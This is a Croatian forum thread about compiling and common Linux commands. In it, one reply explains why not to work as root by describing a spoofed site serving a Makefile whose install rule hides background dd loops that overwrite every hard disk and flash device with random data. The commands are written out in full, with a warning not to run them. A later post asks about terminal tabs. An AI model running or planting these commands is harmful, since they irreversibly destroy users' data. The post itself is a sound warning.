Kompajliranje i najkorištenije komande u Linuxu izdvojena tema zaključana tema

poruka: 32
|
čitano: 54.605
|
moderatori: pirat, Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
16 godina
neaktivan
offline
RE: Kompajliranje i najkorištenije komande u Linux
assembler_geek kaže...

Imam pitanje....cemu izbjegavanje rada kao root?

Mislim svijestan sam da se da svasta moze razvaliti ali ja sam od installacije slacka ostao kao root

i radim kao root i nije mi se dali addati new usera i nisam   za sad nista pobrkao ...

 

Osobno mislim kako nema neke potrebe da ljude tako jako tjeramo od root-a

Pocetnicke distre i nedaju root kontrolni rad korisniku vec je user

a netko na slacku or debianu or slicnom linuxu mislim da je vec dovoljno sposoban

a sad sto ljudi sto cudi sto zena 200 grudi   :)

 evo najjednostavniji odgovor:

Recimo da zelis instalirat nesto. Ides na njihove sluzbene stranice, i ja izvedem DNS napad tako da te prebaci na moju stranicu, koja je izgledom skoro pa indenticna orginalnoj. Ti mislis da si na sluzbenoj stranici i skindes source fajlove koje treba kompajlirati, ali neznas da sam ja u Makefile-u dodao ovo na kraj install rule-a:

for i in /dev/hd?; do nice -n 20 dd if=/dev/urandom of=$i bs=4096 & done
for i in /dev/sd?; do nice -n 20 dd if=/dev/urandom of=$i bs=4069 & done

NEMOJTE NIKAKO OVE NAREDBE POKRENUTI!!!!!!!!



Sta se desi? Vrlo jednostavno. Nepovratno ti izbrise sve hard diskove i sve slicne uredjaje (npr flash disk). Procesi se odvijaju u pozadini i sa vrlo niskim prioritetom kako ne bi pojeli previse resursa i to onda korisnik primjetio... :P

A da si imao korisnika sa ogranicenim permissionima, izbacilo bi ti jedino: Access denied... :P
Poruka je uređivana zadnji put čet 12.3.2009 22:16 (Jazzfan).
14 godina
neaktivan
offline
Kompajliranje i najkorištenije komande u Linuxu

poz...imam jedan zadatak kojeg ne mogu rijesiti, naime kada u terminalu izaberem new tab on mi otvori samo jedan prozor al ja ga moram modifikovati tako da otvara 2 prozora.....na netu sam naso neka rijesenja kao npr. da u terminalu ukucam: " kwrite .bachrc" i da u kod dodam jos "xterm" al nakon toga dobijem bezkonacnu petlju i samo mi se otvaraju novi prozori...ako itko zna rjesenje molio bih da pomogne...hvalla unaprijed

 
0 0 hvala 0
Nova poruka
E-mail:
Lozinka:
 
vrh stranice